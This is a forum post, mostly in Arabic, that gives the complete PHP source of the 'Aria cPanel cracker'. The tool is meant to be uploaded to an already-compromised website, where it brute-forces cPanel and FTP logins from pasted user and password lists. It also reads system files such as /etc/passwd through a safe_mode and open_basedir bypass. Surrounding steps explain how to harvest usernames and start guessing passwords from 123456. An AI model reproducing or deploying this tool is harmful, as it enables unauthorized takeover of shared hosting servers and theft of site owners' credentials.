Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: اخترق السيرفر بشكل كامل


Senior Member

Status: Offline
Posts: 319
Date:
اخترق السيرفر بشكل كامل
Permalink Closed


السلام عليكم ورحمه الله

سنتكلم اليوم عن اختاق السيرفر بعد رفعك شل على المواقع او من خلال ثغره لوكل فايل استطعت الحصول على
اليوزاتا حق المواقع لسيرفر معين طيب بقى الباسورادت باماكنك تخمينها بشكل رائع وبسكربت مجرب
طبعا ترفع هذا الملف وتسميه cpanel.php

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<title>Aria cPanel cracker version : 1.0</title>
<style>
body{margin:0px;font-style:normal;font-size:10px;color:white;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:white;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #66; font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #66;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: black;}
a:active { outline: none; }
a:focus { -moz-outline-style: none; }
</style>
  <style type='text/css'>
  <!--
  A:link {text-decoration: none; color:#cc }
  A:visited {text-decoration: none; color:#cc }
  a:hover {text-decoration: none; color:black}
  -->
</style>
<?php
/* This Code was originaly written by Aria-Security Team [Persian Security Network]
we are not responsible for any damage/usage done with this script
    http://Aria-Security.com
*/
@ini_set('memory_limit', 100);
$connect_timeout=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$users = $_REQUEST['users'];
$pass = $_REQUEST['passwords'];
$target = $_REQUEST['target'];
$option = $_REQUEST['option'];
$page = $_GET['page'];

if($target == ''){
$target = 'localhost';
}
?>

<?php
print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#66 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#66 border=1><tr><td width='70%'>
<br><b><center><a href='?page=bio'> bio </a> - <a href='?page=crack'> brute </a> - <a href='?page=users'> grab users </a><br><br></center></td></tr></table>";
if ( $page == 'bio' ){
print
"<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#66 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#66 border=1><tr><td>
<br><b>Please enter your USERNAME and PASSWORD to logon<br>
user<br>
220 +ok<br>
pass **<br>
220 +ok login successful<br>
[ user@aria-security.com ]# info<b><br><font face=tahoma><br>
<font color='red' >Aria cPanel cracker version : 1.0 </font><b><br><br>
Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version<br>
Our website , <a href='http://Aria-security.com'> http://Aria-security.com</a><br>
</center><br></td></tr></table>";
}elseif( $page == 'crack'){
// Aria-Security Team [Persian Security Network]
@ini_set('memory_limit', 100);
$connect_timeout=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$users = $_REQUEST['users'];
$pass = $_REQUEST['passwords'];
$target = $_REQUEST['target'];
$option = $_REQUEST['option'];
if($target == ''){
$target = 'localhost';
}
print " <div align='center'>
<form method='post' style='border: 1px solid black'><br><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#66 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#66 border=1><tr><td>
<b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
<div align='center'><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#66 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#66 border=1>
<tr>
<td align='center'>
<b>Username</b></td>
<td>
<p align='center'>
<b>Password</b></td>
</tr>
</table>
<p align='center'>
<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: black; color:#C0C0C0'>$users</textarea>
<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: black; color:#C0C0C0'>$pass</textarea><br>
<br>  
<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
</td></tr></table></td></tr></form><p align= 'left'>";
?>
<?php
function ftp_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {

print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}

elseif ( curl_errno($ch) == 0 ){

print
"<b>[ user@aria-security.com ]# </b>
<b> Attacking has been done , found username , <font color='#FF0000'> $user </font> and password ,
<font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}

function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){

print
"<b>[ user@aria-security.com ]# </b>
<b>Attacking has been done , found username , <font color='#FF0000'> $user </font> and password ,
<font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}

if(isset($submit) && !empty($submit)){

$userlist = explode ("\n" , $users );
$passlist = explode ("\n" , $pass );
print "<b>[ user@aria-security.com ]# Attacking ...</font></b><br>";
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password ) {
$_pass = trim($password);
if($option == "ftp"){
ftp_check($target,$_user,$_pass,$connect_timeout);
}
if ($option == "cpanel")
{
cpanel_check($target,$_user,$_pass,$connect_timeout);
}
}
}
}
}elseif ( $page == 'users'){
echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#66 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#66 border=1><tr><td>";
echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="grab !"></form>';
$file = $_POST['file'];
$level=0;
if(!file_exists("file:"))
    @mkdir("file:");
@chdir("file:");
$level++;

$hardstyle = @explode("/", $file); // A R I A

for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
  if(!file_exists($hardstyle[$a]))
    @mkdir($hardstyle[$a]);
  @chdir($hardstyle[$a]);
  $level++;
    }
}
while($level--) chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: black; color:#C0C0C0' >";
if(FALSE==curl_exec($ch))
die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
echo ' </textarea> </FONT>';
curl_close($ch);
print '</table>';
}
?>
save as cpanel.php and upload to the website and locate the shell

lets see etc/passwd file first

هذا شكل السكربت بعد الرفع
to get only users from the file ,after getting users only
go to brute option and paste the users list

[Image: jb8WnU.png]
in password field start with 123456
and click BRUTE BOOM u get password with username

[Image: jbDZ0U.png]



__________________
Page 1 of 1  sorted by
 
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard